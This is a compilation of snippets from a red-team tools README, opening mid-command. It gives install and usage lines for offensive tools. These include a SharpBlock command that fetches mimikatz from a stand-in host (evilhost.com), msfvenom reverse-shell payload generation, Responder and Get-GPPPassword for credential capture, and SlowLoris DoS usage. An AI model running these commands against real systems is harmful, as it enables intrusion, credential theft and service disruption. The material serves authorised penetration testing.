"https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh ``` -------------------------------- ### Run BeRoot (Command Line) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Executes the BeRoot tool to identify potential privilege escalation opportunities. An optional password can be provided to potentially yield more results. ```bash # Run BeRoot python beroot.py # Run BeRoot with user password (If you know the password use it, you could get more results) python beroot.py --password super_strong_password ``` -------------------------------- ### Usage Enum4linux Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates various ways to use enum4linux for enumerating information from Windows and Samba systems. Options include performing all checks, listing users, listing groups, and verbose output. ```bash # 'Do everything' enum4linux.pl -a 192.168.2.55 # Obtain list of usernames (RestrictAnonymous = 0) enum4linux.pl -U 192.168.2.55 # Obtain list of usernames (using authentication) enum4linux.pl -u administrator -p password -U 192.168.2.55 # Get a list of groups and their members enum4linux.pl -G 192.168.2.55 # Verbose scan enum4linux.pl -v 192.168.2.55 ``` -------------------------------- ### Install Coercer Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Coercer Python script using pip. This tool is used to automatically coerce Windows servers to authenticate. ```bash sudo python3 -m pip install coercer ``` -------------------------------- ### Compile Ligolo-ng Agent and Proxy (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Instructions for compiling the ligolo-ng agent and proxy applications from source code using Go. Requires Go version 1.17 or higher. Supports cross-compilation for Windows. ```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go # Build for Windows GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go ``` -------------------------------- ### Execute Payload with SharpBlock (HTTP) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Launches a payload (e.g., mimikatz) over HTTP using notepad as the host process, designed to block specific DLLs like SylantStrike's. Requires a remote HTTP server hosting the payload. This command outputs the execution to standard output. ```bash SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee ``` -------------------------------- ### Usage of CrackMapExec (Bash) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates the basic usage of CrackMapExec for SMB scanning. It requires the target IP address, domain, a user list, and a password list. Ensure these inputs are correctly formatted. ```bash crackmapexec smb -d -u -p ``` -------------------------------- ### Install Donut-shellcode on Linux Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the donut-shellcode Python package on Linux systems using pip. This package allows for the creation of shellcode from various file types. ```bash pip3 install donut-shellcode ``` -------------------------------- ### Build Donut with MinGW-w64 or Linux Make Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Builds the Donut tool on Windows using MinGW-w64 or on Linux using make. This process generates the necessary components for Donut's operation. ```bash make -f Makefile.mingw ``` -------------------------------- ### Install Evil-WinRM via Ruby Gem Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Evil-WinRM tool using the Ruby gem package manager. This provides a command-line interface for Windows Remote Management. ```bash gem install evil-winrm ``` -------------------------------- ### Compile SharpBlock Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Instructions for compiling the SharpBlock binary using Visual Studio 2019 Community Edition. This involves opening the project solution file and building in 'Release' mode. ```bash Use [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) to compile the SharpBlock binary. Open the SharpBlock [project .sln](https://github.com/CCob/SharpBlock), choose "Release", and build. ``` -------------------------------- ### Install smtp-user-enum Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs smtp-user-enum, a Python tool for enumerating SMTP users via VRFY, EXPN, and RCPT commands. It includes features for handling timeouts and retries. ```bash pip install smtp-user-enum ``` -------------------------------- ### Install John the Ripper Source: https://github.com/a-poc/redteam-tools/blob/main/README.md John the Ripper is another popular password cracking utility. This command uses the apt package manager to install John the Ripper on a Debian-based Linux system. ```bash sudo apt-get install john -y ``` -------------------------------- ### Create and Execute WSH Payload Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This snippet demonstrates how to create a VBScript payload to run calc.exe and execute it using wscript or cscript. It also shows an alternative execution method if .vbs files are blacklisted. ```vbs Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\\Windows\\System32\\calc.exe " & WScript.ScriptFullName),0,True ``` ```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted ``` -------------------------------- ### Run Dismap (Linux/MacOS) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Executes the Dismap binary on Linux or MacOS after making it executable. The '-h' flag displays help information. ```bash chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h ``` -------------------------------- ### Gitrob: Save and Load Session Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates how to save a Gitrob session to a file for later use and how to load a previously saved session. This is useful for resuming scans or analyzing findings. ```bash gitrob -save ~/gitrob-session.json acmecorp gitrob -load ~/gitrob-session.json ``` -------------------------------- ### Run Social Engineer Toolkit (SET) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Launches the Social Engineer Toolkit (SET) interactive interface. SET is used for creating believable attack campaigns with custom attack vectors. ```bash python3 setoolkit ``` -------------------------------- ### Install and Use feroxbuster Forced Browsing Tool (Kali) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Feroxbuster is a tool designed for forced browsing, enumerating and accessing unlinked resources on a web application. This installation command is specific to Kali Linux. ```bash sudo apt update && sudo apt install -y feroxbuster ``` -------------------------------- ### Veil - List Payloads and Encoders Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates how to list available payloads and encoders for the 'Ordnance' tool within the Veil framework. ```bash # List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-payloads # List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-encoders ``` -------------------------------- ### Run Responder Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Launches the Responder tool with specified options. Responder listens for name resolution requests and responds with malicious information to capture credentials. ```bash ./Responder.py [options] ``` -------------------------------- ### Install and Use Get-GPPPassword (PowerShell) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Steps to install and use the Get-GPPPassword PowerShell script from the PowerSploit toolkit. This script retrieves passwords for local accounts managed via Group Policy Preferences by searching and decrypting files in the SYSVOL folder. ```powershell powershell.exe -ep bypass Import-Module PowerSploit ``` ```powershell # Get all passwords with additional information Get-GPPPassword # Get list of all passwords Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq ``` -------------------------------- ### Demiguise: Clone and Install Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demiguise is a tool for generating HTML files containing encrypted HTA content. This serves as an evasion technique by dynamically decrypting and executing the HTA within the browser when a target visits the page. Installation involves cloning the repository and navigating into the directory. ```bash git clone https://github.com/nccgroup/demiguise cd demiguise ``` -------------------------------- ### Generate Meterpreter Reverse TCP Shell with msfvenom Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Creates a Windows or Linux executable payload for a Meterpreter reverse TCP connection using msfvenom. Requires Metasploit Framework to be installed. LHOST and LPORT should be replaced with the attacker's IP and desired listening port. ```bash msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf ``` -------------------------------- ### Install and Use Nuclei Vulnerability Scanner Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Nuclei is a fast vulnerability scanner that utilizes YAML templates to detect specific security issues. Installation is typically done via Go. Usage involves piping a list of domains to the nuclei command along with specified template directories. ```bash go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest ``` ```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/ ``` -------------------------------- ### Install and Use SlowLoris DoS Attack Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md SlowLoris is a denial-of-service (DoS) tool designed to tie up web server resources with HTTP requests, making it difficult for legitimate users to access the site. It can be installed via pip or cloned from git. The usage involves specifying the target domain. ```bash sudo pip3 install slowloris ``` ```bash git clone https://github.com/gkbrk/slowloris.git cd slowloris ``` ```bash # Pip slowloris example.com # Git python3 slowloris.py example.com ``` -------------------------------- ### Gowitness: Scan CIDR with Multiple Threads Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Screenshots websites within a given CIDR block using Gowitness. The `--threads` option allows for concurrent scanning to speed up the process. ```bash gowitness scan --cidr 192.168.0.0/24 --threads 20 ```